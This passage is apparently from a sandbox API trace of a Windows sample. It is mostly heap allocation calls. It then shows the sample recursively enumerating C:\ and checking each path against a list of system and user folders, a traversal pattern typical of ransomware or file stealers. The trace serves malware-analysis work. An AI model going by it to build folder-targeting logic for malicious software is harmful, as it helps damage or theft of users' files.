0x72b8e8 [0104.995] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc) returned 0x77d6f8 [0104.995] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b8e8 | out: hHeap=0x6d0000) returned 1 [0104.995] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc) returned 0x77d710 [0104.995] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d6f8 | out: hHeap=0x6d0000) returned 1 [0104.995] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b8f8 | out: hHeap=0x6d0000) returned 1 [0104.995] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc) returned 0x77d6f8 [0104.995] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x10) returned 0x77d728 [0104.995] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d6f8 | out: hHeap=0x6d0000) returned 1 [0104.995] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x10) returned 0x77d6f8 [0104.995] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d728 | out: hHeap=0x6d0000) returned 1 [0104.995] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d710 | out: hHeap=0x6d0000) returned 1 [0104.996] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x10) returned 0x77d710 [0104.996] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x709fe8 [0104.996] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d710 | out: hHeap=0x6d0000) returned 1 [0104.996] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x709fc8 [0104.996] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709fe8 | out: hHeap=0x6d0000) returned 1 [0104.996] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d6f8 | out: hHeap=0x6d0000) returned 1 [0104.996] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x709fe8 [0104.996] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x72bc20 [0104.996] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709fe8 | out: hHeap=0x6d0000) returned 1 [0104.996] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x709fe8 [0104.996] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bc20 | out: hHeap=0x6d0000) returned 1 [0104.996] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709fc8 | out: hHeap=0x6d0000) returned 1 [0104.996] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x709fc8 [0104.996] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x24) returned 0x6e9488 [0104.996] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709fc8 | out: hHeap=0x6d0000) returned 1 [0104.996] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x72bc20 [0104.996] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9488 | out: hHeap=0x6d0000) returned 1 [0104.996] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709fe8 | out: hHeap=0x6d0000) returned 1 [0104.996] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8) returned 0x72b8f8 [0104.996] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc) returned 0x77d6f8 [0104.996] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b8f8 | out: hHeap=0x6d0000) returned 1 [0104.996] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x10) returned 0x77d710 [0104.996] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d6f8 | out: hHeap=0x6d0000) returned 1 [0104.996] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x709fe8 [0104.996] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d710 | out: hHeap=0x6d0000) returned 1 [0104.997] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x24) returned 0x6e9488 [0104.997] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709fe8 | out: hHeap=0x6d0000) returned 1 [0104.997] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9488 | out: hHeap=0x6d0000) returned 1 [0104.997] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bc20 | out: hHeap=0x6d0000) returned 1 [0104.997] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8ac0 | out: hHeap=0x6d0000) returned 1 [0104.997] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x77c228 [0104.997] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f0018 | out: hHeap=0x6d0000) returned 1 [0104.997] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e89d0 | out: hHeap=0x6d0000) returned 1 [0104.997] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x77dae0 [0104.997] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77dae0 | out: hHeap=0x6d0000) returned 1 [0104.997] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x77dae0 [0104.997] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x77dc00 [0104.997] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77dae0 | out: hHeap=0x6d0000) returned 1 [0104.997] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77dc00 | out: hHeap=0x6d0000) returned 1 [0104.997] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x6f0018 [0104.997] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x77dae0 [0104.997] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77dae0 | out: hHeap=0x6d0000) returned 1 [0104.997] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x77dae0 [0104.997] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77dae0 | out: hHeap=0x6d0000) returned 1 [0104.997] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x6f0228 [0104.997] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x77dae0 [0104.997] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77dae0 | out: hHeap=0x6d0000) returned 1 [0104.997] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x77c348 [0104.998] QueryPerformanceCounter (in: lpPerformanceCount=0x27ff660 | out: lpPerformanceCount=0x27ff660*=22495291893) returned 1 [0104.998] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x27ff6a0 | out: lpSystemTimeAsFileTime=0x27ff6a0*(dwLowDateTime=0x2c2f3300, dwHighDateTime=0x1d62227)) [0104.998] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b8f8 [0104.998] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x6e89d0 [0104.998] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x709fe8 [0104.998] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709fe8 | out: hHeap=0x6d0000) returned 1 [0104.998] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e89d0 | out: hHeap=0x6d0000) returned 1 [0104.998] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x6e89d0 [0104.998] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x709fe8 [0104.998] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709fe8 | out: hHeap=0x6d0000) returned 1 [0104.998] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e89d0 | out: hHeap=0x6d0000) returned 1 [0104.998] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b8f8 | out: hHeap=0x6d0000) returned 1 [0104.998] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77c348 | out: hHeap=0x6d0000) returned 1 [0104.998] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72b148 [0104.998] GetLastError () returned 0x0 [0104.998] SetLastError (dwErrCode=0x0) [0104.998] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b148 | out: hHeap=0x6d0000) returned 1 [0104.998] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x77dae0 [0104.998] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x77dc00 [0104.998] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x77dd20 [0104.998] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1b) returned 0x6e89d0 [0104.998] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1b) returned 0x6e8ac0 [0104.998] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x77de40 [0104.999] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x77df60 [0104.999] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1b) returned 0x72bc20 [0104.999] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x77e080 [0104.999] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x513) returned 0x77e1a0 [0104.999] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x77e6c0 [0104.999] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x213) returned 0x6f2000 [0104.999] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77e6c0 | out: hHeap=0x6d0000) returned 1 [0104.999] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x213) returned 0x6f2220 [0104.999] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f2000 | out: hHeap=0x6d0000) returned 1 [0104.999] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1b) returned 0x72bc48 [0104.999] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1b) returned 0x72bc70 [0104.999] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bc48 | out: hHeap=0x6d0000) returned 1 [0104.999] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x77e6c0 [0104.999] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bc70 | out: hHeap=0x6d0000) returned 1 [0104.999] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x213) returned 0x6f2000 [0104.999] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x52b) returned 0x6f2440 [0104.999] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f2440 | out: hHeap=0x6d0000) returned 1 [0104.999] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f2000 | out: hHeap=0x6d0000) returned 1 [0105.000] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f2220 | out: hHeap=0x6d0000) returned 1 [0105.000] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc) returned 0x77d6f8 [0105.000] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0105.000] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1b) returned 0x72bc70 [0105.000] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1b) returned 0x72bc48 [0105.000] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1b) returned 0x72bc98 [0105.000] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1b) returned 0x72bcc0 [0105.000] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bc48 | out: hHeap=0x6d0000) returned 1 [0105.000] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bc70 | out: hHeap=0x6d0000) returned 1 [0105.000] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x213) returned 0x6f2000 [0105.000] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1b) returned 0x72bc70 [0105.000] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1b) returned 0x72bc48 [0105.000] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bc70 | out: hHeap=0x6d0000) returned 1 [0105.000] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x6f2220 [0105.000] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bc48 | out: hHeap=0x6d0000) returned 1 [0105.000] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x23) returned 0x6e9488 [0105.000] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x433) returned 0x6f2340 [0105.000] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f2340 | out: hHeap=0x6d0000) returned 1 [0105.000] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9488 | out: hHeap=0x6d0000) returned 1 [0105.000] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bc20 | out: hHeap=0x6d0000) returned 1 [0105.000] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x6f2340 [0105.000] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f2220 | out: hHeap=0x6d0000) returned 1 [0105.000] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f2000 | out: hHeap=0x6d0000) returned 1 [0105.000] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x709fe8 [0105.000] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x6f2000 [0105.001] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x6f2120 [0105.001] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8ac0 | out: hHeap=0x6d0000) returned 1 [0105.001] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x6f2460 [0105.001] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f2120 | out: hHeap=0x6d0000) returned 1 [0105.001] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bcc0 | out: hHeap=0x6d0000) returned 1 [0105.001] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bc98 | out: hHeap=0x6d0000) returned 1 [0105.001] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0105.001] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f2000 | out: hHeap=0x6d0000) returned 1 [0105.001] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709fe8 | out: hHeap=0x6d0000) returned 1 [0105.001] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d6f8 | out: hHeap=0x6d0000) returned 1 [0105.001] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77e6c0 | out: hHeap=0x6d0000) returned 1 [0105.001] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x77e6c0 [0105.001] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77e6c0 | out: hHeap=0x6d0000) returned 1 [0105.001] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77e1a0 | out: hHeap=0x6d0000) returned 1 [0105.001] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77e080 | out: hHeap=0x6d0000) returned 1 [0105.001] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f2340 | out: hHeap=0x6d0000) returned 1 [0105.001] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77df60 | out: hHeap=0x6d0000) returned 1 [0105.001] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77de40 | out: hHeap=0x6d0000) returned 1 [0105.001] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e89d0 | out: hHeap=0x6d0000) returned 1 [0105.001] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77dd20 | out: hHeap=0x6d0000) returned 1 [0105.001] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77dc00 | out: hHeap=0x6d0000) returned 1 [0105.001] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x6f2000 [0105.001] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x6f2120 [0105.002] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f2000 | out: hHeap=0x6d0000) returned 1 [0105.002] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f2120 | out: hHeap=0x6d0000) returned 1 [0105.002] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f2460 | out: hHeap=0x6d0000) returned 1 [0105.002] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77dae0 | out: hHeap=0x6d0000) returned 1 [0105.002] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f0228 | out: hHeap=0x6d0000) returned 1 [0105.002] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bbf8 | out: hHeap=0x6d0000) returned 1 [0105.002] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77c228 | out: hHeap=0x6d0000) returned 1 [0105.002] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b8b8 | out: hHeap=0x6d0000) returned 1 [0105.002] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df128 | out: hHeap=0x6d0000) returned 1 [0105.002] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8a70 | out: hHeap=0x6d0000) returned 1 [0105.002] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b8d8 | out: hHeap=0x6d0000) returned 1 [0105.002] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0105.002] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8a48 | out: hHeap=0x6d0000) returned 1 [0105.002] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b8c8 | out: hHeap=0x6d0000) returned 1 [0105.002] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f0120 | out: hHeap=0x6d0000) returned 1 [0105.002] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8a98 | out: hHeap=0x6d0000) returned 1 [0105.002] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ef090 | out: hHeap=0x6d0000) returned 1 [0105.002] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e74c8 | out: hHeap=0x6d0000) returned 1 [0105.002] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77c4c8 | out: hHeap=0x6d0000) returned 1 [0105.002] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a8a8 | out: hHeap=0x6d0000) returned 1 [0105.002] lstrcpyW (in: lpString1=0x27ff80c, lpString2="C:\\" | out: lpString1="C:\\") returned="C:\\" [0105.002] PathAddBackslashW (in: pszPath="C:\\" | out: pszPath="C:\\") returned="" [0105.002] lstrlenW (lpString="C:\\") returned 3 [0105.002] FindFirstFileExW (in: lpFileName="C:\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x6e93f8 [0105.003] lstrcmpW (lpString1="$Recycle.Bin", lpString2=".") returned -1 [0105.003] lstrcmpW (lpString1="$Recycle.Bin", lpString2="..") returned -1 [0105.003] lstrlenW (lpString="$Recycle.Bin") returned 12 [0105.003] lstrcatW (in: lpString1="C:\\", lpString2="$Recycle.Bin" | out: lpString1="C:\\$Recycle.Bin") returned="C:\\$Recycle.Bin" [0105.003] lstrcmpiW (lpString1="C:\\$Recycle.Bin", lpString2="C:\\Windows") returned -1 [0105.003] lstrcmpiW (lpString1="C:\\$Recycle.Bin", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0105.003] lstrcmpiW (lpString1="C:\\$Recycle.Bin", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0105.003] lstrcmpiW (lpString1="C:\\$Recycle.Bin", lpString2="C:\\ProgramData") returned -1 [0105.003] lstrcmpiW (lpString1="C:\\$Recycle.Bin", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned -1 [0105.003] lstrcmpiW (lpString1="C:\\$Recycle.Bin", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow") returned -1 [0105.003] lstrcmpiW (lpString1="C:\\$Recycle.Bin", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned -1 [0105.003] lstrcmpiW (lpString1="C:\\$Recycle.Bin", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned -1 [0105.003] lstrcmpiW (lpString1="C:\\$Recycle.Bin", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned -1 [0105.003] lstrcmpiW (lpString1="C:\\$Recycle.Bin", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned -1 [0105.003] lstrcmpiW (lpString1="C:\\$Recycle.Bin", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned -1 [0105.003] lstrcmpiW (lpString1="C:\\$Recycle.Bin", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0105.003] lstrcmpiW (lpString1="C:\\$Recycle.Bin", lpString2="C:\\Intel") returned -1 [0105.003] lstrcmpiW (lpString1="C:\\$Recycle.Bin", lpString2="C:\\msys32") returned -1 [0105.003] lstrcmpiW (lpString1="C:\\$Recycle.Bin", lpString2="C:\\Qt") returned -1 [0105.003] lstrcmpiW (lpString1="C:\\$Recycle.Bin", lpString2="C:\\ProgramData") returned -1 [0105.004] lstrcmpiW (lpString1="C:\\$Recycle.Bin", lpString2="C:\\Program Files") returned -1 [0105.004] lstrcmpiW (lpString1="C:\\$Recycle.Bin", lpString2="C:\\Windows") returned -1 [0105.004] lstrcmpiW (lpString1="C:\\$Recycle.Bin", lpString2="C:\\Program Files (x86)") returned -1 [0105.004] lstrcatW (in: lpString1="C:\\$Recycle.Bin", lpString2="\\" | out: lpString1="C:\\$Recycle.Bin\\") returned="C:\\$Recycle.Bin\\" [0105.004] lstrlenW (lpString="C:\\$Recycle.Bin\\") returned 16 [0105.004] FindFirstFileExW (in: lpFileName="C:\\$Recycle.Bin\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x72a788 [0105.004] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0105.004] FindNextFileW (in: hFindFile=0x72a788, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0105.004] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0105.004] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0105.004] FindNextFileW (in: hFindFile=0x72a788, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0105.004] lstrcmpW (lpString1="S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2=".") returned 1 [0105.005] lstrcmpW (lpString1="S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2="..") returned 1 [0105.005] lstrlenW (lpString="S-1-5-21-3388679973-3930757225-3770151564-1000") returned 46 [0105.005] lstrcatW (in: lpString1="C:\\$Recycle.Bin\\", lpString2="S-1-5-21-3388679973-3930757225-3770151564-1000" | out: lpString1="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000" [0105.005] lstrcmpiW (lpString1="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2="C:\\Windows") returned -1 [0105.005] lstrcmpiW (lpString1="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0105.005] lstrcmpiW (lpString1="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0105.005] lstrcmpiW (lpString1="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2="C:\\ProgramData") returned -1 [0105.005] lstrcmpiW (lpString1="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned -1 [0105.005] lstrcmpiW (lpString1="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow") returned -1 [0105.005] lstrcmpiW (lpString1="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned -1 [0105.005] lstrcmpiW (lpString1="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned -1 [0105.005] lstrcmpiW (lpString1="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned -1 [0105.005] lstrcmpiW (lpString1="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned -1 [0105.005] lstrcmpiW (lpString1="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned -1 [0105.005] lstrcmpiW (lpString1="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0105.005] lstrcmpiW (lpString1="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2="C:\\Intel") returned -1 [0105.005] lstrcmpiW (lpString1="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2="C:\\msys32") returned -1 [0105.005] lstrcmpiW 